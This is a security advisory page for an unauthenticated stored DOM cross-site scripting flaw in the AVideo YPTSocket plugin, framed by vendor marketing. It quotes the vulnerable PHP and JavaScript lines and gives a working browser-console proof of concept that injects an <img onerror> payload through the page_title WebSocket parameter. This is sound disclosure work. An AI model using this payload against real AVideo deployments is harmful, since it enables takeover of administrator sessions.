Get a Demo

Let's Patch It!

Book a short call with one our specialists, we'll walk you through how Endor Patches work, and ask you a few questions about your environment (like your primary programming languages and repository management). We'll also send you an email right after you fill out the form, feel free to reply with any questions you have in advance!

CVE

GHSA-8whc-2wmv-ww35

WWBN AVideo: Unauthenticated Stored DOM Cross-Site Scripting via Per-Client Metadata Broadcast in YPTSocket Plugin
Back to all
CVE

GHSA-8whc-2wmv-ww35

WWBN AVideo: Unauthenticated Stored DOM Cross-Site Scripting via Per-Client Metadata Broadcast in YPTSocket Plugin

Unauthenticated Stored DOM XSS via page_title Broadcast in AVideo YPTSocket Plugin

Summary

A stored DOM Cross-Site Scripting vulnerability (CWE-79) in the AVideo YPTSocket plugin lets any unauthenticated remote attacker execute arbitrary JavaScript in the authenticated origin of every administrator currently viewing a page that renders the YPTSocket online-users debug panel. plugin/YPTSocket/getWebSocket.json.php issues a signed WebSocket token to any anonymous caller, and MessageSQLiteV2::onOpen at plugin/YPTSocket/MessageSQLiteV2.php lines 91 and 110 reads the attacker-controlled webSocketSelfURI and page_title query parameters from the WebSocket connection URL with no validation. Both values persist into the in-memory SQLite connections table and broadcast inside the usersidonline array sent to every connected client; on the client, plugin/YPTSocket/script.js::updateSocketUserCard interpolates the broadcast page_title into an HTML template literal that is passed to jQuery $.append(html), which parses attacker bytes into live DOM nodes including <img> with inline event handlers.

Details

plugin/YPTSocket/getWebSocket.json.php issues a WebSocket token to any caller; the only gate is AVideoPlugin::isEnabledByName("YPTSocket"). The token-issuance helper getEncryptedInfo() at plugin/YPTSocket/functions.php:21-24 writes $_REQUEST['webSocketSelfURI'] directly into the per-token state without validation:

// plugin/YPTSocket/functions.php:21-24
if (!empty($_REQUEST['webSocketSelfURI'])) {
    $msgObj->selfURI = $_REQUEST['webSocketSelfURI'];
} else {
    $msgObj->selfURI = getSelfURI();
}

On WebSocket open, MessageSQLiteV2::onOpen reads webSocketSelfURI and page_title from the connection URL query string and persists both verbatim into the in-memory SQLite connections table:

// plugin/YPTSocket/MessageSQLiteV2.php:91 and :110
$client['selfURI']    = $wsocketGetVars['webSocketSelfURI'];        // line 91
$client['page_title'] = @utf8_encode(@$wsocketGetVars['page_title']); // line 110

utf8_encode is not an HTML encode. The broadcast helper dbGetUniqueUsers() (plugin/YPTSocket/db.php:288-300) selects both columns without escape and returns them as part of usersidonline, which msgToResourceId() at MessageSQLiteV2.php:444 places in the outbound JSON frame sent to every connected client. JSON encoding escapes " to \" for transport, but the receiving browser's JSON.parse(event.data) reverses the escape and restores the raw HTML bytes before they reach script.js.

On the client, plugin/YPTSocket/script.js::updateSocketUserCard (lines 638 to 700) interpolates the broadcast page_title into an HTML template literal and passes the result to jQuery $.append(html):

// plugin/YPTSocket/script.js:685-691
if (userData.page_title) textParts.push(userData.page_title);
const finalText = textParts.join(' ');
const html = `<a href="${selfURI}" target="_blank" ...>
                <i class="far fa-compass"></i> ${finalText}
              </a>`;
$(`#${socketUserDivID} .socketUserPages`).append(html);  // sink

jQuery's .append(html) parses the string with the browser HTML parser, building live DOM nodes for any tag the attacker supplied, including <img> with inline event handlers. The browser's load attempt on the attacker-supplied src fails and the inline onerror event handler fires synchronously inside the admin's authenticated origin.

The victim precondition is that the YPTSocket online-users debug panel (#socketUsersURI) is rendered in the admin's DOM. plugin/YPTSocket/footer.php:12 renders the panel when User::isAdmin() && !empty($obj->debugSocket). The debugSocket plugin flag is true by default after enable, so any admin viewing any logged-in AVideo page with the standard YPTSocket footer holds a live broadcast subscription.

Affected product: AVideo (WWBN), YPTSocket plugin

Tested version: master branch (snapshot dated 2026-05-22)

PoC

The AVideo deployment must have the YPTSocket plugin enabled (the default after enable) with debugSocket=true (the default), and at least one administrator must currently be viewing a page that loads the YPTSocket footer (any logged-in AVideo page does). The attacker requires only network reachability to getWebSocket.json.php over HTTPS and to the WebSocket TLS port.

Open DevTools Console on any browser tab pointed at the AVideo origin and paste the following one-liner. No authentication and no session cookie are required for the attacker side:

(async () => {
  const PAYLOAD = '<img src=q onerror="document.body.style.backgroundColor=String.fromCharCode(114,101,100);document.title=String.fromCharCode(80,87,78,69,68)">';
  const r = await fetch('/plugin/YPTSocket/getWebSocket.json.php?webSocketSelfURI=' + encodeURIComponent('/dashboard?x=1'));
  const j = await r.json();
  const u = j.webSocketURL
          + '&webSocketSelfURI=' + encodeURIComponent('/dashboard?x=1')
          + '&page_title='       + encodeURIComponent(PAYLOAD);
  const ws = new WebSocket(u);
  ws.onopen    = () => console.log('attacker connected');
  ws.onmessage = e => console.log('attacker frame:', e.data.slice(0, 200));
})();

The payload uses String.fromCharCode to spell its side-effect strings (String.fromCharCode(114,101,100) decodes to redString.fromCharCode(80,87,78,69,68) decodes to PWNED) so no quote, backtick, or backslash bytes appear in transit. Within one server broadcast cycle, every administrator tab currently rendering the YPTSocket debug panel turns its page background red and changes its browser tab title to PWNED. Both side-effects are produced by attacker JavaScript executing inside the admin's authenticated AVideo origin.

Impact

This is a stored DOM Cross-Site Scripting vulnerability (CWE-79) in the AVideo YPTSocket plugin. An unauthenticated remote attacker who can reach the YPTSocket endpoints plants the payload by issuing one anonymous HTTP GET to getWebSocket.json.php followed by one anonymous WebSocket frame carrying the malicious page_title. The attacker JavaScript executes inside the admin's authenticated AVideo origin and can read non-HttpOnly cookies and the CSRF token rendered into the admin dashboard, issue authenticated requests to any admin-only endpoint, exfiltrate the admin dashboard DOM, and chain into any admin-context mutation. When the victim is an AVideo administrator, the attacker turns a single anonymous WebSocket connection into full administrative takeover via the admin's own session.

Package Versions Affected

Package Version
patch Availability
No items found.

Automatically patch vulnerabilities without upgrading

Fix Without Upgrading
Detect compatible fix
Apply safe remediation
Fix with a single pull request

CVSS Version

Severity
Base Score
CVSS Version
Score Vector
C
H
U
-
C
H
U
0
-
3.1
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:L
C
H
U
-

Related Resources

No items found.

References

https://github.com/WWBN/AVideo/security/advisories/GHSA-8whc-2wmv-ww35, https://github.com/WWBN/AVideo/commit/8be71e53ccbe9b84b30870db386fb4d2b11e1c16, https://github.com/WWBN/AVideo

Severity

9.6

CVSS Score
0
10

Basic Information

Ecosystem
Base CVSS
9.6
EPSS Probability
0%
EPSS Percentile
0%
Introduced Version
0
Fix Available

Fix Critical Vulnerabilities Instantly

Secure your app without upgrading.
Fix Without Upgrading